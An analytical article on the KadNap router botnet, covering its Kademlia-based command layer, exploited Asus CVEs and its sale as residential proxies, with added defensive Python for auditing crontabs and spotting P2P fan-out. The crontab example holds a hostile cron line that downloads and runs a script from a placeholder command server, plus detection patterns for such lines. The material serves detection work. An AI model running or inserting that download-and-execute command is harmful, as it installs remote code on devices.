KadNap Botnet Exposes the Router Security Crisis Nobody Fixed

Fourteen thousand routers are not a crisis. They are a proof of concept. The discovery of KadNap, a malware strain that has quietly conscripted over 14,000 Asus routers and other edge devices into a peer-to-peer proxy botnet, is less a novel threat and more a predictable consequence of an industry that has spent a decade refusing to treat consumer network hardware as critical infrastructure. What makes KadNap worth studying is not its scale, which remains modest by botnet standards, but its architecture: a custom implementation of the Kademlia distributed hash table protocol that represents a meaningful evolution in how botnets hide their command infrastructure. The operators behind KadNap are not just building a botnet. They are building a business, one that sells access to compromised residential IP addresses through a storefront called Doppelganger, and in doing so, they have revealed the ugly economics that make router exploitation one of cybercrime's most reliable revenue streams.
The Kademlia Trick: Why This Architecture Matters
Most botnets rely on a relatively straightforward command-and-control model. Infected devices phone home to a server, receive instructions, and execute them. Take down the server, and the botnet goes dark, at least temporarily. KadNap's operators chose a different path. They built their C2 layer on top of a customized version of the Kademlia distributed hash table, the same protocol that once powered BitTorrent's decentralized peer discovery and still underpins several legitimate peer-to-peer networks.
In a Kademlia network, every node has a unique identifier, and routing happens through a series of iterative lookups across the distributed hash table. No single node knows the full topology. Each compromised router in the KadNap network generates a hash from its device data, joins the DHT, exchanges encrypted data with peers, and uses the distributed lookup mechanism to locate C2 servers. The result is that the actual control infrastructure is hidden behind layers of peer-to-peer indirection. Traditional network monitoring that looks for suspicious outbound connections to known malicious IPs sees only router-to-router traffic that superficially resembles legitimate P2P activity.
This is not entirely new. The Hajime botnet used a similar DHT approach as far back as 2016. But KadNap's implementation is more refined, and researchers at Black Lotus Labs discovered an important weakness: before reaching the C2 servers, infected nodes consistently connect to two specific bootstrap nodes. This reduces the decentralization that a pure Kademlia implementation would achieve and provides defenders with a chokepoint. The lesson is instructive. P2P botnets are theoretically resilient, but in practice, their operators often introduce centralized dependencies that can be targeted. The question is whether defenders will act on this intelligence before the operators patch their own design flaw.
A Decade of Warnings Asus Did Not Heed
The selection of Asus routers as KadNap's primary target is neither random nor surprising. Asus has one of the longest and most documented histories of router security failures of any major manufacturer, and the pattern reveals a structural unwillingness to prioritize firmware security that predates KadNap by years.
In 2016, the Federal Trade Commission settled charges against Asus after hackers placed text files on thousands of consumers' routers, essentially taunting owners that their devices were wide open to the internet. The settlement required Asus to maintain a comprehensive security program and submit to independent audits for 20 years. Nine years into that consent decree, Asus routers remain among the most frequently exploited consumer network devices on the planet.
The vulnerability chain tells the story. In 2023, CVE-2023-39780 disclosed an authenticated command injection flaw in the RT-AX55 line. Through 2024, a series of additional command injection vulnerabilities, CVE-2023-41345 through CVE-2023-41348 and CVE-2024-12912, provided attackers with reliable remote code execution. In early 2025, CVE-2025-2492 added an improper authentication bypass. By mid-2025, CVE-2025-59366, a critical authentication bypass with a CVSS score of 9.2 affecting routers with AiCloud enabled, was patched, but by then KadNap had already been active for months.
The pattern is not one of zero-day exploitation. KadNap does not need zero-days. It exploits known vulnerabilities in firmware that users never update, on devices that manufacturers treat as fire-and-forget products. The infection chain starts with a shell script called "aic.sh" downloaded from a C2 server, which establishes a cron job to periodically fetch and execute payloads disguised as ".asusrouter". The malware targets both ARM and MIPS architectures, covering the vast majority of consumer router hardware. Nothing about this is sophisticated. It is simply thorough.
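The persistence step above gives a defender something concrete to hunt for on a device that exposes a shell: a cron entry that fetches remote content and runs a payload stored as a hidden dotfile. The following is an added example, not code from the article or from the researchers it cites; the crontab it scans is constructed, the host and URL are placeholders, and the two indicator names are the ones the article itself mentions.

```python
import re

# Heuristics drawn from the infection chain described above: a cron entry
# that fetches a remote script and runs a payload stored as a hidden dotfile.
REMOTE_FETCH = re.compile(r"\b(wget|curl)\b[^;&|]*https?://", re.I)
HIDDEN_EXEC = re.compile(r"(?:\bsh\b|\bbash\b|\bchmod\b|\./)\s*[^\s;&|]*/\.[A-Za-z0-9_]+")
KNOWN_NAMES = ("aic.sh", ".asusrouter")   # indicators named in the write-up

def audit_crontab(text):
    """Return [(line_no, command, reasons)] for entries worth a closer look.

    Handles classic five-field schedules (plus an optional user column, as in
    /etc/crontab); @reboot-style shortcuts are deliberately left to the reader.
    """
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:          # not a 5-field schedule followed by a command
            continue
        cmd = fields[5]
        reasons = []
        if REMOTE_FETCH.search(cmd):
            reasons.append("fetches remote content")
        if HIDDEN_EXEC.search(cmd):
            reasons.append("executes a hidden dotfile")
        if any(k in cmd for k in KNOWN_NAMES):
            reasons.append("references a named indicator")
        if reasons:
            findings.append((n, cmd, reasons))
    return findings

# Constructed crontab: one benign entry and one modelled on the chain above.
# The C2 host is a placeholder in the reserved .invalid TLD, not a real IoC.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * wget -q http://c2.example.invalid/aic.sh -O /tmp/.asusrouter; sh /tmp/.asusrouter
"""

if __name__ == "__main__":
    for line_no, cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: {cmd}\n  -> {', '.join(reasons)}")
```

On a real device the input would be the output of `crontab -l` (and any files under the cron spool) rather than the constructed string.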
The Residential Proxy Economy: Where Botnets Become Businesses
The most significant aspect of KadNap is not its technical architecture but its business model. The infected routers are not being used primarily for DDoS attacks or cryptocurrency mining, the traditional monetization strategies for botnets. Instead, they are being sold as residential proxy infrastructure through a service called Doppelganger, believed to be a rebrand of the earlier Faceless proxy service.
Residential proxies are valuable because they route traffic through real consumer IP addresses, making the traffic appear to originate from legitimate home internet connections rather than data centers or known VPN exit nodes. This defeats IP reputation systems, geographic restrictions, and rate limiting. For cybercriminals, residential proxies enable credential stuffing attacks that bypass bot detection, ad fraud that passes verification checks, and reconnaissance that does not trigger security alerts.
The economics are straightforward and lucrative. Legitimate residential proxy services charge anywhere from $5 to $15 per gigabyte of traffic routed through their networks. Criminal proxy services like Doppelganger can undercut those prices dramatically because their marginal cost is essentially zero: the bandwidth is stolen from unwitting router owners, and the infrastructure is the botnet itself. At even a fraction of legitimate pricing, a network of 14,000 nodes generating continuous revenue represents a substantial and recurring income stream.
This business model creates a perverse incentive structure. Unlike DDoS botnets, where the value of an infected device is measured in bandwidth capacity during an attack, proxy botnets generate more revenue when their nodes remain online, undetected, and stable for long periods. This means KadNap's operators are incentivized to keep infected routers running smoothly, avoid noisy behavior that might trigger user complaints, and maintain the malware persistently. The cron job persistence mechanism and the quiet proxy-only functionality reflect this economic logic. These operators do not want your router to crash. They want it to keep running, quietly forwarding traffic, for as long as possible.
The residential proxy market has grown explosively in recent years, driven by demand from both legitimate businesses (market research, ad verification, price comparison) and criminal enterprises. This dual-use nature makes it difficult to regulate or disrupt. When law enforcement takes down a criminal proxy service, its customers simply migrate to another provider, and new services emerge within weeks. Doppelganger's apparent connection to the defunct Faceless service illustrates this lifecycle perfectly.
60% American: Why the U.S. Is the Primary Target
More than 60% of KadNap's infected devices are located in the United States. This concentration is not accidental but reflects several converging factors that make American home networks uniquely attractive targets for proxy botnet operators.
First, American residential IP addresses command a premium in the proxy market. U.S. IPs are required for accessing domestic financial services, e-commerce platforms, and advertising networks, making them the most valuable commodity in the residential proxy ecosystem. Second, the U.S. has an enormous installed base of consumer routers that are rarely updated. Unlike mobile phones, which receive automatic over-the-air updates, most consumer routers require manual firmware updates that the vast majority of users never perform. According to VulnCheck's 2026 State of Exploitation report, 42.5% of exploited vulnerabilities in 2025 affected devices that were end-of-life or likely end-of-life, and consumer routers account for 56% of exploited edge device vulnerabilities.
Third, American broadband connections offer high bandwidth and reliable uptime, which directly translates to proxy service quality. A compromised router on a fiber connection in suburban America is a far more valuable proxy node than one on a congested connection in a developing market. The operators of Doppelganger understand this calculus and have optimized their targeting accordingly.
This geographic concentration also creates a policy problem. The devices are owned by American consumers, operated on American networks, and used to facilitate crimes that often target American companies and individuals. Yet the regulatory framework for consumer device security remains fragmented. The FCC's nascent Cyber Trust Mark program for IoT devices is voluntary and does not cover routers already in the field. The FTC's 20-year consent decree with Asus has demonstrably failed to prevent the company's products from remaining among the most exploited devices in the world.
What Comes Next: Predictions for the Proxy Botnet Arms Race
KadNap's relatively modest scale of 14,000 nodes should not provide comfort. It represents the industrialization of a model that will scale significantly in the coming years, and several specific developments are likely.
First, expect KadNap's operators or their successors to fix the bootstrap node weakness that researchers identified. A fully decentralized Kademlia implementation without consistent centralized chokepoints would be substantially harder to disrupt. The blueprint exists in academic literature on peer-to-peer networks, and the gap between KadNap's current implementation and a more resilient one is not large.
Second, the residential proxy business model will attract more sophisticated operators. The combination of recurring revenue, low operational costs, and strong market demand makes botnet-powered proxy services one of the highest-return criminal enterprises available. As this market matures, expect to see improved customer interfaces, SLA guarantees, geographic targeting options, and integration with other criminal services. The professionalization of cybercrime-as-a-service is well documented, and proxy services are following the same trajectory.
Third, manufacturers will continue to fail at securing edge devices until the economic incentives change. The fundamental problem is that router security is a negative externality. The cost of a compromised router is borne primarily by the victims of the crimes routed through it, not by the router's owner or manufacturer. Until regulation imposes mandatory automatic firmware updates, enforced end-of-life sunset dates, and financial liability on manufacturers for unpatched devices, the supply of exploitable routers will remain abundant.
For security teams and network administrators, the immediate action items are concrete. Audit your network for Asus routers, particularly models in the RT-AX series. Disable remote management (WAN access) on all consumer-grade routers. Implement network monitoring that flags unusual peer-to-peer traffic patterns from edge devices. Replace any router that has reached end-of-life status and no longer receives firmware updates. And recognize that the router sitting in your office closet or your employees' homes is not a passive piece of infrastructure. It is, increasingly, a target with a price on its head.
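The monitoring item above, together with the bootstrap chokepoint described in the Kademlia section, can be turned into a simple flow-level detector: flag edge devices with DHT-like fan-out to many distinct peers on high ports, then look for destinations that every flagged device contacted first. This is an added example rather than anything published by the article's authors or Black Lotus Labs; the flow records are constructed, the addresses are documentation ranges rather than real KadNap infrastructure, and the fan-out threshold and "first two destinations" rule are assumptions to tune against your own baseline.

```python
from collections import defaultdict

# Constructed flow records (timestamp, src_ip, dst_ip, dst_port). Two routers
# each contact the same two hosts first, then fan out to six peers on high
# ports; a laptop does ordinary HTTPS; a fourth host makes one high-port flow.
def _flows():
    f = []
    for i, src in enumerate(("10.0.0.1", "10.0.0.2")):
        t = 100 * i
        f += [(t, src, "203.0.113.5", 6000), (t + 1, src, "203.0.113.6", 6000)]
        f += [(t + 2 + k, src, f"198.51.100.{10 * i + k}", 40000 + k) for k in range(1, 7)]
    f += [(300, "10.0.0.3", "198.51.100.40", 443), (301, "10.0.0.3", "198.51.100.41", 443)]
    f += [(400, "10.0.0.4", "198.51.100.50", 8080)]
    return f

FLOWS = _flows()
FANOUT_THRESHOLD = 5   # distinct high-port peers before a device is suspicious (assumed)
FIRST_N = 2            # how many earliest destinations to treat as "bootstrap" (assumed)

def find_p2p_devices(flows, fanout=FANOUT_THRESHOLD):
    """Return {src_ip: peer_count} for devices with DHT-like fan-out."""
    peers = defaultdict(set)
    for _, src, dst, port in flows:
        if port >= 1024:                     # high ports only: P2P heuristic, not proof
            peers[src].add(dst)
    return {src: len(p) for src, p in peers.items() if len(p) >= fanout}

def find_bootstrap_candidates(flows, suspects, first_n=FIRST_N):
    """Destinations contacted first by more than one suspect: the chokepoint."""
    first = defaultdict(list)
    for _, src, dst, _ in sorted(flows):     # tuples sort by timestamp first
        if src in suspects and dst not in first[src] and len(first[src]) < first_n:
            first[src].append(dst)
    counts = defaultdict(int)
    for dsts in first.values():
        for d in dsts:
            counts[d] += 1
    return sorted(d for d, c in counts.items() if c >= 2)

if __name__ == "__main__":
    suspects = find_p2p_devices(FLOWS)
    print("P2P-like devices:", suspects)
    print("shared first-contact hosts:", find_bootstrap_candidates(FLOWS, suspects))
```

Real NetFlow or Zeek conn logs carry the same four fields, so the functions apply unchanged once the records are loaded; the shared first-contact hosts are what you would block or sinkhole after confirming them.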
The KadNap story is ultimately about the collision between the consumer electronics industry's planned obsolescence model and the cybercriminal economy's insatiable demand for clean residential IP addresses. As long as millions of routers sit on networks running firmware that will never be updated, protected by passwords that were never changed, the next KadNap is already being built. The only question is how large the next one will be before anyone with the power to change the incentives actually does.